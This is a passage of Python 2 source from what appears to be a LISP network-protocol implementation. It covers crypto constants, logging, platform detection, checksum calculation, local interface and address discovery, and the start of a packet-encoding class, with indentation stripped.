LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
fd = open("./logs/lisp-traceback.log", "a")
fd.write("---------- Exception occurred: {} ----------\n".format(ts))
try:
traceback.print_last(file=fd)
except:
fd.write("traceback.print_last(file=fd) failed")
#endtry
try:
traceback.print_last()
except:
print("traceback.print_last() failed")
#endtry
fd.close()
return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
sys.excepthook = lisp_record_traceback
return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
if (platform.dist()[0] != "debian"): return(False)
return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian_kali
#
# Return True if this system is running Kali Linux.
#
def lisp_is_debian_kali():
return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
return(platform.uname()[0] == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Alpine Linux operating system.
#
def lisp_is_alpine():
return(os.path.exists("/etc/alpine-release"))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
cpu = platform.machine()
return(cpu in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
return(platform.uname()[0] == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
vm = commands.getoutput("sudo dmidecode -s bios-version")
return(vm.lower().find("google") != -1)
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
logfile = "./logs/lisp-{}.log".format(lisp_log_id)
if (os.path.exists(logfile)): return
sys.stdout.close()
sys.stdout = open(logfile, "a")
lisp_print_banner(bold("logfile rotation", False))
return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
global lisp_hostname
lisp_log_id = name
if (name == "itr"): lisp_i_am_itr = True
if (name == "etr"): lisp_i_am_etr = True
if (name == "rtr"): lisp_i_am_rtr = True
if (name == "mr"): lisp_i_am_mr = True
if (name == "ms"): lisp_i_am_ms = True
if (name == "ddt"): lisp_i_am_ddt = True
if (name == "core"): lisp_i_am_core = True
#
# Set hostname to normalize dino-macbook.local or
# dino-macbook.wp.comcast.net to "dino-macbook".
#
lisp_hostname = socket.gethostname()
index = lisp_hostname.find(".")
if (index != -1): lisp_hostname = lisp_hostname[0:index]
return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
force = ("force" in args)
if (lisp_debug_logging == False and force == False): return
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print "{}: {}:".format(ts, lisp_log_id),
for arg in args:
if (arg == "force"): continue
print arg,
#endfor
print ""
try: sys.stdout.flush()
except: pass
return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
if (lisp_data_plane_logging): lprint(*args)
return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
lisp_process_logfile()
ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
ts = ts[:-3]
print red(">>>", False),
print "{}:".format(ts),
for arg in args: print arg,
print red("<<<\n", False)
try: sys.stdout.flush()
except: pass
return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
global lisp_version, lisp_hostname
if (lisp_version == ""):
lisp_version = commands.getoutput("cat lisp-version.txt")
#endif
hn = bold(lisp_hostname, False)
lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
datetime.datetime.now(), lisp_version, hn))
return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
if (html): return('<font color="green"><b>{}</b></font>'.format(string))
return(bold("\033[92m" + string + "\033[0m", html))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
return(green(string, True))
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
return('<font color="#58D68D"><b>{}</b></font>'.format(string))
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
if (html): return('<font color="red"><b>{}</b></font>'.format(string))
return(bold("\033[91m" + string + "\033[0m", html))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
if (html): return('<font color="blue"><b>{}</b></font>'.format(string))
return(bold("\033[94m" + string + "\033[0m", html))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
if (html): return("<b>{}</b>".format(string))
return("\033[1m" + string + "\033[0m")
#enddef
#
# convert_font
#
# Converts from text-based bold/color to HTML bold/color.
#
def convert_font(string):
escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
right = "[0m"
for e in escapes:
left = e[0]
color = e[1]
offset = len(left)
index = string.find(left)
if (index != -1): break
#endfor
while (index != -1):
end = string[index::].find(right)
bold_string = string[index+offset:index+end]
string = string[:index] + color(bold_string, True) + \
string[index+end+offset::]
index = string.find(left)
#endwhile
#
# Call this function one more time if a color was in bold.
#
if (string.find("[1m") != -1): string = convert_font(string)
return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
b = '<button style="background-color:transparent;border-radius:10px; ' + \
'type="button">'
if (url == None):
html = b + string + "</button>"
else:
a = '<a href="{}">'.format(url)
s = lisp_space(2)
html = s + a + b + string + "</button></a>" + s
#endif
return(html)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
output = '<font face="Courier New">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
output = '<font face="Sans-Serif">{}</font>'.format(string)
return(output)
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
output = '<span title="{}">{}</span>'.format(hover_string, string)
return(output)
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
eid_help_str = \
'''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
eid_help_str = \
'''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
hover = lisp_span(output, eid_help_str)
return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
output = ""
for i in range(num): output += " "
return(output)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
return(random.randrange(32768, 65535))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
def lisp_get_data_nonce():
return(random.randint(0, 0xffffff))
#enddef
#
# lisp_get_control_nonce
#
# Get a 64-bit random nonce to insert in control packets.
#
def lisp_get_control_nonce():
return(random.randint(0, (2**64)-1))
#enddef
#
# lisp_hex_string
#
# Take an integer, either 16, 32, or 64 bits in width and return a hex string.
# But don't return the leading "0x". And don't return a trailing "L" if the
# integer is a negative 64-bit value (high-order bit set).
#
def lisp_hex_string(integer_value):
value = hex(integer_value)[2::]
if (value[-1] == "L"): value = value[0:-1]
return(value)
#enddef
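#
# For example: lisp_hex_string(0x1f) returns "1f", and on Python 2 a
# 64-bit value like 0xffffffffffffffff returns "ffffffffffffffff" with
# the trailing "L" stripped.
#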
#
# lisp_get_timestamp
#
# Use time library to get a current timestamp.
#
def lisp_get_timestamp():
return(time.time())
#enddef
#
# lisp_set_timestamp
#
# Use time library to set time into the future.
#
def lisp_set_timestamp(seconds):
return(time.time() + seconds)
#enddef
#
# lisp_print_elapsed
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_elapsed(ts):
if (ts == 0 or ts == None): return("never")
elapsed = time.time() - ts
elapsed = round(elapsed, 0)
return(str(datetime.timedelta(seconds=elapsed)))
#enddef
#
# lisp_print_future
#
# Time value (variable ts) was created via time.time().
#
def lisp_print_future(ts):
if (ts == 0): return("never")
future = ts - time.time()
if (future < 0): return("expired")
future = round(future, 0)
return(str(datetime.timedelta(seconds=future)))
#enddef
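#
# For example: a timestamp set 90 seconds ahead via lisp_set_timestamp(90)
# prints as roughly "0:01:30", and an already-passed one as "expired".
#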
#
# lisp_print_eid_tuple
#
# Prints in html or returns a string of the following combinations:
#
# [<iid>]<eid>/<ml>
# <eid>/<ml>
# ([<iid>]<source-eid>/ml, [<iid>]<group>/ml)
#
# This is called by most of the data structure classes as "print_eid_tuple()".
#
def lisp_print_eid_tuple(eid, group):
eid_str = eid.print_prefix()
if (group.is_null()): return(eid_str)
group_str = group.print_prefix()
iid = group.instance_id
if (eid.is_null() or eid.is_exact_match(group)):
index = group_str.find("]") + 1
return("[{}](*, {})".format(iid, group_str[index::]))
#endif
sg_str = eid.print_sg(group)
return(sg_str)
#enddef
#
# lisp_convert_6to4
#
# IPC messages will store an IPv4 address in an IPv6 "::ffff:<ipv4-addr>"
# format since we have a udp46 tunnel open. Convert it to an IPv4 address.
#
def lisp_convert_6to4(addr_str):
if (addr_str.find("::ffff:") == -1): return(addr_str)
addr = addr_str.split(":")
return(addr[-1])
#enddef
#
# lisp_convert_4to6
#
# We are sending on a udp46 socket, so if the destination is IPv6
# we have an address format we can use. If destination is IPv4 we
# need to put the address in a IPv6 IPv4-compatible format.
#
# Returns a lisp_address().
#
def lisp_convert_4to6(addr_str):
addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
addr.store_address(addr_str)
return(addr)
#enddef
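#
# For example: lisp_convert_4to6("10.1.1.1") stores "::ffff:10.1.1.1",
# while an IPv6 address string is stored unchanged.
#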
#
# lisp_gethostbyname
#
# Return an address if string is a name or address. If socket.gethostbyname()
# fails, try socket.getaddrinfo(). We may be running on Alpine Linux which
# doesn't return DNS names with gethostbyname().
#
def lisp_gethostbyname(string):
ipv4 = string.split(".")
ipv6 = string.split(":")
mac = string.split("-")
if (len(ipv4) > 1):
if (ipv4[0].isdigit()): return(string)
#endif
if (len(ipv6) > 1):
try:
int(ipv6[0], 16)
return(string)
except:
pass
#endtry
#endif
#
# Make sure there are hex digits between dashes, otherwise could be a
# valid DNS name with dashes.
#
if (len(mac) == 3):
for i in range(3):
try: int(mac[i], 16)
except: break
#endfor
#endif
try:
addr = socket.gethostbyname(string)
return(addr)
except:
if (lisp_is_alpine() == False): return("")
#endtry
#
# Try different approach on Alpine.
#
try:
addr = socket.getaddrinfo(string, 0)[0]
if (addr[3] != string): return("")
addr = addr[4][0]
except:
addr = ""
#endtry
return(addr)
#enddef
#
# lisp_ip_checksum
#
# Input to this function is 20-bytes in packed form. Calculate IP header
# checksum and place in byte 10 and byte 11 of header.
#
def lisp_ip_checksum(data):
if (len(data) < 20):
lprint("IPv4 packet too short, length {}".format(len(data)))
return(data)
#endif
ip = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 40, 4):
checksum += int(ip[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 10 and 11.
#
checksum = struct.pack("H", checksum)
ip = data[0:10] + checksum + data[12::]
return(ip)
#enddef
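#
# A quick self-check sketch (the standard one's-complement property, not
# part of the original module): summing all ten 16-bit words of a header
# that already carries its checksum folds to 0xffff.
#
#   def lisp_ip_checksum_ok(header20):
#       s = sum(struct.unpack("!10H", header20))
#       s = (s >> 16) + (s & 0xffff)
#       s += s >> 16
#       return((s & 0xffff) == 0xffff)
#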
#
# lisp_icmp_checksum
#
# Checksum an ICMP Destination Unreachable Too Big message. It will statically
# checksum 36 bytes.
#
def lisp_icmp_checksum(data):
if (len(data) < 36):
lprint("ICMP packet too short, length {}".format(len(data)))
return(data)
#endif
icmp = binascii.hexlify(data)
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, 36, 4):
checksum += int(icmp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at bytes 2 and 4.
#
checksum = struct.pack("H", checksum)
icmp = data[0:2] + checksum + data[4::]
return(icmp)
#enddef
#
# lisp_udp_checksum
#
# Calculate the UDP pseudo header checksum. The variable 'data' is a UDP
# packet buffer starting with the UDP header with the checksum field zeroed.
#
# What is returned is the UDP packet buffer with a non-zero/computed checksum.
#
# The UDP pseudo-header is prepended to the UDP packet buffer which the
# checksum runs over:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Source Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# + +
# | |
# + Destination Address +
# | |
# + +
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Upper-Layer Packet Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | zero | Next Header |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lisp_udp_checksum(source, dest, data):
#
# Build pseudo-header for IPv6.
#
s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
udplen = socket.htonl(len(data))
next_header = socket.htonl(LISP_UDP_PROTOCOL)
pheader = s.pack_address()
pheader += d.pack_address()
pheader += struct.pack("II", udplen, next_header)
#
# Append UDP packet to pseudo-header. Add zeros to make 4 byte aligned.
#
udp = binascii.hexlify(pheader + data)
add = len(udp) % 4
for i in range(0,add): udp += "0"
#
# Go 2-bytes at a time so we only have to fold carry-over once.
#
checksum = 0
for i in range(0, len(udp), 4):
checksum += int(udp[i:i+4], 16)
#endfor
#
# Add in carry and byte-swap.
#
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum += checksum >> 16
checksum = socket.htons(~checksum & 0xffff)
#
# Pack in 2-byte buffer and insert at last 2 bytes of UDP header.
#
checksum = struct.pack("H", checksum)
udp = data[0:6] + checksum + data[8::]
return(udp)
#enddef
#
# lisp_get_interface_address
#
# Based on supplied interface device, return IPv4 local interface address.
#
def lisp_get_interface_address(device):
#
# Check for illegal device name.
#
if (device not in netifaces.interfaces()): return(None)
#
# Check if there are no IPv4 addresses assigned to interface.
#
addresses = netifaces.ifaddresses(device)
if (addresses.has_key(netifaces.AF_INET) == False): return(None)
#
# Find first private address.
#
return_address = lisp_address(LISP_AFI_IPV4, "", 32, 0)
for addr in addresses[netifaces.AF_INET]:
addr_str = addr["addr"]
return_address.store_address(addr_str)
return(return_address)
#endfor
return(None)
#enddef
#
# lisp_get_input_interface
#
# Based on destination-MAC address of incoming pcap'ed packet, index into
# lisp_mymacs{} to get an interface name string (device name) for all
# interfaces that have the MAC address assigned.
#
# If dest-MAC is not us, look at source MAC to see if we are in a loopback
# situation testing application and xTR in the same system.
#
def lisp_get_input_interface(packet):
macs = lisp_format_packet(packet[0:12]).replace(" ", "")
da = macs[0:12]
sa = macs[12::]
try: my_sa = lisp_mymacs.has_key(sa)
except: my_sa = False
if (lisp_mymacs.has_key(da)): return(lisp_mymacs[da], sa, da, my_sa)
if (my_sa): return(lisp_mymacs[sa], sa, da, my_sa)
return(["?"], sa, da, my_sa)
#enddef
#
# lisp_get_local_interfaces
#
# Go populate the lisp.myinterfaces{} dictionary array. Key is device ID
# returned by the netifaces API.
#
def lisp_get_local_interfaces():
for device in netifaces.interfaces():
interface = lisp_interface(device)
interface.add_interface()
#endfor
return
#enddef
#
# lisp_get_loopback_address
#
# Get first loopback address on device lo which is not 127.0.0.1.
#
def lisp_get_loopback_address():
for addr in netifaces.ifaddresses("lo")[netifaces.AF_INET]:
if (addr["peer"] == "127.0.0.1"): continue
return(addr["peer"])
#endfor
return(None)
#enddef
#
# lisp_is_mac_string
#
# Return True if the supplied string parameter is in the form "xxxx-xxxx-xxxx".
# The input prefix could be "xxxx-xxxx-xxxx/48".
#
def lisp_is_mac_string(mac_str):
mac = mac_str.split("/")
if (len(mac) == 2): mac_str = mac[0]
return(len(mac_str) == 14 and mac_str.count("-") == 2)
#enddef
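#
# Examples (illustrative): lisp_is_mac_string("0050-56aa-bbcc") and
# lisp_is_mac_string("0050-56aa-bbcc/48") both return True, while
# lisp_is_mac_string("00:50:56:aa:bb:cc") returns False.
#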
#
# lisp_get_local_macs
#
# Walk all interfaces, and for each ethernet interface, put the MAC address
# as a key into lisp_mymacs with a value of array of interface names.
#
def lisp_get_local_macs():
for device in netifaces.interfaces():
#
# Ignore bogus interface names that containers may create. Allow
# interface names with colons, dashes, and alphanumeric characters.
#
d = device.replace(":", "")
d = device.replace("-", "")
if (d.isalnum() == False): continue
#
# Need this for EOS because a "pimreg" interface will crash the call
# to netifaces.ifaddresses("pimreg").
#
try:
parms = netifaces.ifaddresses(device)
except:
continue
#endtry
if (parms.has_key(netifaces.AF_LINK) == False): continue
mac = parms[netifaces.AF_LINK][0]["addr"]
mac = mac.replace(":", "")
#
# GRE tunnels have strange MAC addresses (less than 48-bits). Ignore
# them.
#
if (len(mac) < 12): continue
if (lisp_mymacs.has_key(mac) == False): lisp_mymacs[mac] = []
lisp_mymacs[mac].append(device)
#endfor
lprint("Local MACs are: {}".format(lisp_mymacs))
return
#enddef
#
# lisp_get_local_rloc
#
# Use "ip addr show" on Linux and "ifconfig" on MacOS to get a local IPv4
# address. Get interface name from "netstat -rn" to grep for.
#
def lisp_get_local_rloc():
out = commands.getoutput("netstat -rn | egrep 'default|0.0.0.0'")
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#
# Get last item on first line of output.
#
out = out.split("\n")[0]
device = out.split()[-1]
addr = ""
macos = lisp_is_macos()
if (macos):
out = commands.getoutput("ifconfig {} | egrep 'inet '".format(device))
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
else:
cmd = 'ip addr show | egrep "inet " | egrep "{}"'.format(device)
out = commands.getoutput(cmd)
if (out == ""):
cmd = 'ip addr show | egrep "inet " | egrep "global lo"'
out = commands.getoutput(cmd)
#endif
if (out == ""): return(lisp_address(LISP_AFI_IPV4, "", 32, 0))
#endif
#
# The output may span multiple lines. Favor returning a private
# address so NAT traversal is used in lig.
#
addr = ""
out = out.split("\n")
for line in out:
a = line.split()[1]
if (macos == False): a = a.split("/")[0]
address = lisp_address(LISP_AFI_IPV4, a, 32, 0)
return(address)
#endif
return(lisp_address(LISP_AFI_IPV4, addr, 32, 0))
#endif
#
# lisp_get_local_addresses
#
# Use netifaces module to get an IPv4 and IPv6 local RLOC of this system.
# Return an array of 2 elements where [0] is an IPv4 RLOC and [1] is an
# IPv6 RLOC.
#
# Stores data in lisp.lisp_myrlocs[].
#
def lisp_get_local_addresses():
global lisp_myrlocs
#
# Check to see if we should not get the first address. Use environment
# variable (1-based addressing) to determine which one to get. If the
# number of addresses is less than the index, use the last one.
#
# The format of the environment variable could be <number> or
# <device>:<number>. The format could also be "<device>:" but make sure
# the user typed in a ":".
#
device_select = None
index = 1
parm = os.getenv("LISP_ADDR_SELECT")
if (parm != None and parm != ""):
parm = parm.split(":")
if (len(parm) == 2):
device_select = parm[0]
index = parm[1]
else:
if (parm[0].isdigit()):
index = parm[0]
else:
device_select = parm[0]
#endif
#endif
index = 1 if (index == "") else int(index)
#endif
rlocs = [None, None, None]
rloc4 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
rloc6 = lisp_address(LISP_AFI_IPV6, "", 128, 0)
device_iid = None
for device in netifaces.interfaces():
if (device_select != None and device_select != device): continue
addresses = netifaces.ifaddresses(device)
if (addresses == {}): continue
#
# Set instance-ID for interface.
#
device_iid = lisp_get_interface_instance_id(device, None)
#
# Look for a non-link-local and non-loopback address.
#
if (addresses.has_key(netifaces.AF_INET)):
ipv4 = addresses[netifaces.AF_INET]
count = 0
for addr in ipv4:
rloc4.store_address(addr["addr"])
if (rloc4.is_ipv4_loopback()): continue
if (rloc4.is_ipv4_link_local()): continue
if (rloc4.address == 0): continue
count += 1
rloc4.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc4, False)): continue
rlocs[0] = rloc4
if (count == index): break
#endfor
#endif
if (addresses.has_key(netifaces.AF_INET6)):
ipv6 = addresses[netifaces.AF_INET6]
count = 0
for addr in ipv6:
addr_str = addr["addr"]
rloc6.store_address(addr_str)
if (rloc6.is_ipv6_string_link_local(addr_str)): continue
if (rloc6.is_ipv6_loopback()): continue
count += 1
rloc6.instance_id = device_iid
if (device_select == None and
lisp_db_for_lookups.lookup_cache(rloc6, False)): continue
rlocs[1] = rloc6
if (count == index): break
#endfor
#endif
#
# Did we find an address? If not, loop and get the next interface.
#
if (rlocs[0] == None): continue
rlocs[2] = device
break
#endfor
addr1 = rlocs[0].print_address_no_iid() if rlocs[0] else "none"
addr2 = rlocs[1].print_address_no_iid() if rlocs[1] else "none"
device = rlocs[2] if rlocs[2] else "none"
device_select = " (user selected)" if device_select != None else ""
addr1 = red(addr1, False)
addr2 = red(addr2, False)
device = bold(device, False)
lprint("Local addresses are IPv4: {}, IPv6: {} from device {}{}, iid {}". \
format(addr1, addr2, device, device_select, device_iid))
lisp_myrlocs = rlocs
return((rlocs[0] != None))
#enddef
#
# lisp_get_all_addresses
#
# Return a list of all local IPv4 and IPv6 addresses from kernel. This is
# going to be used for building pcap and iptables filters. So no loopback or
# link-local addresses are returned.
#
def lisp_get_all_addresses():
address_list = []
for interface in netifaces.interfaces():
try: entry = netifaces.ifaddresses(interface)
except: continue
if (entry.has_key(netifaces.AF_INET)):
for addr in entry[netifaces.AF_INET]:
a = addr["addr"]
if (a.find("127.0.0.1") != -1): continue
address_list.append(a)
#endfor
#endif
if (entry.has_key(netifaces.AF_INET6)):
for addr in entry[netifaces.AF_INET6]:
a = addr["addr"]
if (a == "::1"): continue
if (a[0:5] == "fe80:"): continue
address_list.append(a)
#endfor
#endif
#endfor
return(address_list)
#enddef
#
# lisp_get_all_multicast_rles
#
# Grep lisp.config and get all multicast RLEs that appear in the configuration.
# Returns either an empty array or filled with one or more multicast addresses.
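# For example, a lisp.config line "rle-address = 224.1.1.1" yields
# ["224.1.1.1"]; addresses outside 224.0.0.0/4 are ignored.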
#
def lisp_get_all_multicast_rles():
rles = []
out = commands.getoutput('egrep "rle-address =" ./lisp.config')
if (out == ""): return(rles)
lines = out.split("\n")
for line in lines:
if (line[0] == "#"): continue
rle = line.split("rle-address = ")[1]
rle_byte = int(rle.split(".")[0])
if (rle_byte >= 224 and rle_byte < 240): rles.append(rle)
#endfor
return(rles)
#enddef
#------------------------------------------------------------------------------
#
# LISP packet contents. This keeps state for a LISP encapsulated packet that
# is processed by an RTR and ETR.
#
class lisp_packet():
def __init__(self, packet):
self.outer_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.outer_tos = 0
self.outer_ttl = 0
self.udp_sport = 0
self.udp_dport = 0
self.udp_length = 0
self.udp_checksum = 0
self.inner_source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_sport = 0
self.inner_dport = 0
self.lisp_header = lisp_data_header()
self.packet = packet
self.inner_version = 0
self.outer_version = 0
self.encap_port = LISP_DATA_PORT
self.inner_is_fragment = False
self.packet_error = ""
self.gleaned_dest = False
#enddef
def encode(self, nonce):
#
# We could be running with no RLOCs found. If lisp_myrlocs[] is None,
# then self.outer_source will be LISP_AFI_NONE.
#
if (self.outer_source.is_null()): return(None)
#
# We have to build the LISP header here because if we are doing
# lisp-crypto, the ICV covers the LISP header. The function
# lisp_packet.encrypt() will put in the key-id.
#
if (nonce == None):
self.lisp_header.nonce(lisp_get_data_nonce())
elif (self.lisp_header.is_request_nonce(nonce)):
self.lisp_header.request_nonce(nonce)
else:
self.lisp_header.nonce(nonce)
#endif
self.lisp_header.instance_id(self.inner_dest.instance_id)
#
# Encrypt the packet. If something goes wrong, send the packet
# unencrypted by signaling key-id 0 to the RLOC. For now, just use
# key-id 1. We are supporting just a single key.
#
self.lisp_header.key_id(0)
control = (self.lisp_header.get_instance_id() == 0xffffff)
if (lisp_data_plane_security and control == False):
addr_str = self.outer_dest.print_address_no_iid() + ":" + \
str(self.encap_port)
if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]):
keys[1].use_count += 1
packet, encrypted = self.encrypt(keys[1], addr_str)
if (encrypted): self.packet = packet
#endif
#endif
#endif
#
# Start with UDP header. Call hash_packet() to set source-port value.
# Unless we are doing lisp-crypto and nat-traversal.
#
self.udp_checksum = 0
if (self.encap_port == LISP_DATA_PORT):
if (lisp_crypto_ephem_port == None):
if (self.gleaned_dest):
self.udp_sport = LISP_DATA_PORT
else:
self.hash_packet()
#endif
else:
self.udp_sport = lisp_crypto_ephem_port
#endif
else:
self.udp_sport = LISP_DATA_PORT
